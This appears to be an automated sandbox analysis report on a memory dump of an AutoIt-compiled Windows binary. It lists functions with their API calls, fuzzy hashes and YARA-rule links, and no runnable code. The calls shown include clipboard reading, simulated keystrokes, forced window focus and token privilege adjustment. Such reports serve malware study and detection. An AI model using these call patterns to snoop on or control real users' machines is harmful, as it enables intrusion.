API String ID: 1473721057-0
Opcode ID: 56f303805ae07a59d64802f7b363ba46088b809d41565f0745ebe38a1bff1cb1
Instruction ID: afd64e75fa039e617f46a48676cb971c1e986e19e72b491f13c10feb6796c4b3
Opcode Fuzzy Hash: 56f303805ae07a59d64802f7b363ba46088b809d41565f0745ebe38a1bff1cb1
Instruction Fuzzy Hash: A3411674508351DFDB25DF14C484B1ABBE0BF49318F19889CE9994B762C332E889CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00144F3D, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00144D13: FreeLibrary.KERNEL32(00000000,?), ref: 00144D4D

Part of subcall function 0016548B: __wfsopen.LIBCMT ref: 00165496

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00144F6F

Part of subcall function 00144CC8: FreeLibrary.KERNEL32(00000000), ref: 00144D02

Part of subcall function 00144DD0: _memmove.LIBCMT ref: 00144E1A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: fab01930f9e9fa225fb3750329667468a8834c15eb88a3236f7699250198c9ce
Instruction ID: 42d25e1df0ebfe6dbe84ef27f617c014c398e4db257bbe71ddb360de493b96ce
Opcode Fuzzy Hash: fab01930f9e9fa225fb3750329667468a8834c15eb88a3236f7699250198c9ce
Instruction Fuzzy Hash: 1C11E731600609ABCB14AFB4DC52FAE77A59F60710F11842DF541A71D1DF719A159760

Uniqueness

Uniqueness Score: -1.00%

Function 001801AF, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 001801BB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: be377d481ccdc9f86b7bed274a3836221f2c349779c77db724139677f8337ddf
Instruction ID: 49d4bb2a93bab871d1e2fd2f10adfd1a91735475c3efafd5642f5de2e15be24e
Opcode Fuzzy Hash: be377d481ccdc9f86b7bed274a3836221f2c349779c77db724139677f8337ddf
Instruction Fuzzy Hash: F32130B4508341DFCB24DF54C884B1ABBE1BF88314F0A896CF89A5B761C731E859CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00160941, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001609F4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: f86a96366a37c178c69555b4444f018880071d893a91903bbc658304eeedbc32
Instruction ID: 8fa4da5c4301ebdceb2764dd58c0ee9191fd2343003f77de335e53324f8fffdb
Opcode Fuzzy Hash: f86a96366a37c178c69555b4444f018880071d893a91903bbc658304eeedbc32
Instruction Fuzzy Hash: E601843A08E3C18FC7138BB4D8D6AA07FF4DE0312432905EED8C48B466D596096EDB22

Uniqueness

Uniqueness Score: -1.00%

Function 0019FC4D, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0019FC88

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 91b5b92eadcd754ce8edc56934ce2625089368b624e7bf2fdd50f7d8489bcefc
Instruction ID: 68f7fad4c130da72037924c52827cceb7c3d5bb785d1fb6338f0597454e5ec06
Opcode Fuzzy Hash: 91b5b92eadcd754ce8edc56934ce2625089368b624e7bf2fdd50f7d8489bcefc
Instruction Fuzzy Hash: CF01D132200225ABCB28DF2DCC8196BB7A9EFC5364714842EFC0ACB245E731E911C790

Uniqueness

Uniqueness Score: -1.00%

Function 00147F41, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00147F82

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 42bf0117ddadf755f8ecf972d1d54eeeb49c8616b437ea13d63c1d1bf25ce716
Instruction ID: 175896fbebee82449275b79809527093da1403d29b5a168dc468136b6b428490
Opcode Fuzzy Hash: 42bf0117ddadf755f8ecf972d1d54eeeb49c8616b437ea13d63c1d1bf25ce716
Instruction Fuzzy Hash: 5001F9722147017ED7245F38CC02F67BB94EB44760F10852EF96ACA1E1EB31E4548790

Uniqueness

Uniqueness Score: -1.00%

Function 0019DC20, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00197652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?,?,0019799D), ref: 0019766F
Part of subcall function 00197652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?), ref: 0019768A
Part of subcall function 00197652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?,?), ref: 00197698
Part of subcall function 00197652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0019758C,80070057,?), ref: 001976A8

IIDFromString.OLE32(00000000,?,?,?,0019DAA9,?,?,?,?,?,?,?,?,?), ref: 0019DC57

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 61c807565d360c17329527b17103d9d91018f476ea11383e7ac4e595f02b3140
Instruction ID: 3e4b78ca6465f45a16437d58284143932400924370b158d4ef74c7df2fa9417f
Opcode Fuzzy Hash: 61c807565d360c17329527b17103d9d91018f476ea11383e7ac4e595f02b3140
Instruction Fuzzy Hash: D8F09A76204605DBCF00CF09E980AD6BBA9FF16360B11C02AED08DE155C3F1E940DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00144FAA, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00144FDE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e9ba15df77b28212cba9bd9e7db5976b55cf5a1a09c5261c3051df1b8d35ad38
Instruction ID: 6ec731c1ca138b55d49440ecd16ebda37f93801a0e1fea1e8a85c9615add9613
Opcode Fuzzy Hash: e9ba15df77b28212cba9bd9e7db5976b55cf5a1a09c5261c3051df1b8d35ad38
Instruction Fuzzy Hash: C4F06571105711CFC7349F68E494912BBF1BF143253258A3EE5D782620C731A859DF40

Uniqueness

Uniqueness Score: -1.00%

Function 001609D5, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001609F4

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: cdc2e477a3eab68c2e3001903f965d767f5fa1f59cd982e9c8ad13ad0dcd61a4
Instruction ID: 6f3897158170b3ff8db6bc0a6a3ef80bd8b02f12639e6cc5c725f22c2ffdab1e
Opcode Fuzzy Hash: cdc2e477a3eab68c2e3001903f965d767f5fa1f59cd982e9c8ad13ad0dcd61a4
Instruction Fuzzy Hash: FAE0863690422857C720D6989C05FFA77AEDF886A0F0441B5FC0CD7254DA609C818690

Uniqueness

Uniqueness Score: -1.00%

Function 001A74A9, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 001A74C4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9270c57d09a392904f42a98ed42e383a768c52725edb2a3439d928fe28cd1d8c
Instruction ID: e98ecfaaa352a4ccfe1282c2cd6713b31d22a1a3352cd8d567e1efc4d6e1c0a9
Opcode Fuzzy Hash: 9270c57d09a392904f42a98ed42e383a768c52725edb2a3439d928fe28cd1d8c
Instruction Fuzzy Hash: E2D05B75434318BF972CCB64DC06C777B9CEA06121740036FBC0581540F7A1BD00C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00162E84, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00163457: __lock.LIBCMT ref: 00163459

__onexit_nolock.LIBCMT ref: 00162EA0

Part of subcall function 00162EC8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00162EA5,0017B80A,001FBB50), ref: 00162EDB
Part of subcall function 00162EC8: DecodePointer.KERNEL32(?,?,00162EA5,0017B80A,001FBB50), ref: 00162EE6
Part of subcall function 00162EC8: __realloc_crt.LIBCMT ref: 00162F27
Part of subcall function 00162EC8: __realloc_crt.LIBCMT ref: 00162F3B
Part of subcall function 00162EC8: EncodePointer.KERNEL32(00000000,?,?,00162EA5,0017B80A,001FBB50), ref: 00162F4D
Part of subcall function 00162EC8: EncodePointer.KERNEL32(0017B80A,?,?,00162EA5,0017B80A,001FBB50), ref: 00162F5B
Part of subcall function 00162EC8: EncodePointer.KERNEL32(00000004,?,?,00162EA5,0017B80A,001FBB50), ref: 00162F67

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: e5c7162e56b2e557ef302a8721c0651df820589cdc8139be914aa0706e9eb204
Instruction ID: 455026de79398db32c87bebeeff602714b269e072aea0e89f81ae21a2ff91168
Opcode Fuzzy Hash: e5c7162e56b2e557ef302a8721c0651df820589cdc8139be914aa0706e9eb204
Instruction Fuzzy Hash: 69D0C2B1E0020C9ACB00BBE4CC0235CBA606F30332F504214F020A70C2CB7406114B51

Uniqueness

Uniqueness Score: -1.00%

Function 0017FD76, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0017FD81

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e8176036fabf9953499ff1a7e693d19bac96085e61ec867281560d65233f492e
Instruction ID: 1286fb51dabfc2d53456fc42141f12f1871ef2219da1ab8b17e3430bb97ab780
Opcode Fuzzy Hash: e8176036fabf9953499ff1a7e693d19bac96085e61ec867281560d65233f492e
Instruction Fuzzy Hash: D8D0A770100100CBDB30AF69E804747B7E49F10300F24882DE4D581611D375D8C59B01

Uniqueness

Uniqueness Score: -1.00%

Function 0016548B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00165496

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 89ee202baeef66a9a295db37ec47f9434306f0b9d96d4fbf3a395e94b69285ca
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 18B0927684020C77DF012E82EC02A593B1A9B50678F808060FF0C18162AA73A6B09689

Uniqueness

Uniqueness Score: -1.00%

Function 00163598, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 001635A2

Part of subcall function 00163469: __lock.LIBCMT ref: 00163477
Part of subcall function 00163469: RtlDecodePointer.NTDLL(001FBB70,0000001C,001633C2,00161013,00000001,00000000,?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 001634B6
Part of subcall function 00163469: DecodePointer.KERNEL32(?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 001634C7
Part of subcall function 00163469: EncodePointer.KERNEL32(00000000,?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 001634E0
Part of subcall function 00163469: DecodePointer.KERNEL32(-00000004,?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 001634F0
Part of subcall function 00163469: EncodePointer.KERNEL32(00000000,?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 001634F6
Part of subcall function 00163469: DecodePointer.KERNEL32(?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 0016350C
Part of subcall function 00163469: DecodePointer.KERNEL32(?,00163310,000000FF,?,00169E6E,00000011,00161013,?,00169CBC,0000000D), ref: 00163517

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a9fcecba6c8c5ad237ebd0174aa8455f62d5bc9371f91558c271acce25246c7d
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: 6EB0123158030CB3D9112A45EC03F157B0C4751B50F100020FA0C5C1E1AAD3767050C9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001CCDAC, Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001CCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001CCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001CCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001CCF00
SendMessageW.USER32 ref: 001CCF29
_wcsncpy.LIBCMT ref: 001CCFA1
GetKeyState.USER32(00000011), ref: 001CCFC2
GetKeyState.USER32(00000009), ref: 001CCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001CCFE5
GetKeyState.USER32(00000010), ref: 001CCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001CD018
SendMessageW.USER32 ref: 001CD03F
SendMessageW.USER32(?,00001030,?,001CB602), ref: 001CD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001CD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001CD16E
SetCapture.USER32(?), ref: 001CD177
ClientToScreen.USER32(?,?), ref: 001CD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001CD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001CD203
ReleaseCapture.USER32(?,?,?), ref: 001CD20E
GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 001CD248
ScreenToClient.USER32 ref: 001CD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 001CD2B1
SendMessageW.USER32 ref: 001CD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 001CD31C
SendMessageW.USER32 ref: 001CD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001CD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 001CD37B
GetCursorPos.USER32(?), ref: 001CD39B
ScreenToClient.USER32 ref: 001CD3A8
GetParent.USER32(?), ref: 001CD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 001CD431
SendMessageW.USER32 ref: 001CD462
ClientToScreen.USER32(?,?), ref: 001CD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001CD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 001CD51A
SendMessageW.USER32 ref: 001CD53D
ClientToScreen.USER32(?,?), ref: 001CD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001CD5C3

Part of subcall function 001425DB: GetWindowLongW.USER32(?,000000EB), ref: 001425EC

GetWindowLongW.USER32(?,000000F0), ref: 001CD65F

Strings

F, xrefs: 001CD543
@GUI_DRAGID, xrefs: 001CD1AA
pr , xrefs: 001CD1BD

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pr
API String ID: 3977979337-1942473040
Opcode ID: f63963819145e77839b83520e571d4d110b237b3fa432e9fbc0872baf657eee0
Instruction ID: d1fe55acfd7154f5b286e5246e0beac372f0bd4f8259fd0bc8a304388755a84d
Opcode Fuzzy Hash: f63963819145e77839b83520e571d4d110b237b3fa432e9fbc0872baf657eee0
Instruction Fuzzy Hash: FE428670204241AFC725CF68D888FAABFE6EF59314F14052DF699876A1C731EC95CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00144A35, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00144A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0017DA8E
IsIconic.USER32(?), ref: 0017DA97
ShowWindow.USER32(?,00000009), ref: 0017DAA4
SetForegroundWindow.USER32(?), ref: 0017DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0017DAC4
GetCurrentThreadId.KERNEL32 ref: 0017DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0017DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0017DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0017DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0017DAF8
SetForegroundWindow.USER32(?), ref: 0017DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017DB10
keybd_event.USER32 ref: 0017DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017DB25
keybd_event.USER32 ref: 0017DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017DB33
keybd_event.USER32 ref: 0017DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0017DB42
keybd_event.USER32 ref: 0017DB47
SetForegroundWindow.USER32(?), ref: 0017DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0017DB71

Strings

Shell_TrayWnd, xrefs: 0017DA89

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 3b4a986a37bfbaed78045d552a3d0340c9be5c1958cb7e033cd0edc0f6931b81
Instruction ID: 38b4b614ee774448f3e213f933c9ecff19c1bec7e1a5751647ee518a6107e906
Opcode Fuzzy Hash: 3b4a986a37bfbaed78045d552a3d0340c9be5c1958cb7e033cd0edc0f6931b81
Instruction Fuzzy Hash: D1315371A8031CBFEB216F619C4AF7E3E7DEF44B50F114029FA05E71D0C6B09951AAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00198858, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00198CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00198D0D
Part of subcall function 00198CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00198D3A
Part of subcall function 00198CC3: GetLastError.KERNEL32 ref: 00198D47

_memset.LIBCMT ref: 0019889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001988ED
CloseHandle.KERNEL32(?), ref: 001988FE
OpenWindowStationW.USER32 ref: 00198915
GetProcessWindowStation.USER32 ref: 0019892E
SetProcessWindowStation.USER32(00000000), ref: 00198938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00198952

Part of subcall function 00198713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00198851), ref: 00198728
Part of subcall function 00198713: CloseHandle.KERNEL32(?,?,00198851), ref: 0019873A

Strings

winsta0, xrefs: 00198910
, xrefs: 001988AA
default, xrefs: 0019894D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 6440cfd639aab953f8f050681b3c4fcd42b6fd0672250146e07586f810e36506
Instruction ID: 40039b5fb9d1bf88b27a6de53f27afdd7ab9c019321da7e71f683f88bc24f17a
Opcode Fuzzy Hash: 6440cfd639aab953f8f050681b3c4fcd42b6fd0672250146e07586f810e36506
Instruction Fuzzy Hash: 1E816571900249AFDF11DFA4CC49EEEBBB9EF09314F08416AF910A72A1DB318E55DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001B425A, Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(001CF910), ref: 001B4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 001B4292
GetClipboardData.USER32 ref: 001B429A
CloseClipboard.USER32 ref: 001B42A6
GlobalLock.KERNEL32 ref: 001B42C2
CloseClipboard.USER32 ref: 001B42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 001B42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 001B42EE
GetClipboardData.USER32 ref: 001B42F6
GlobalLock.KERNEL32 ref: 001B4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 001B4337
CloseClipboard.USER32 ref: 001B4447

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

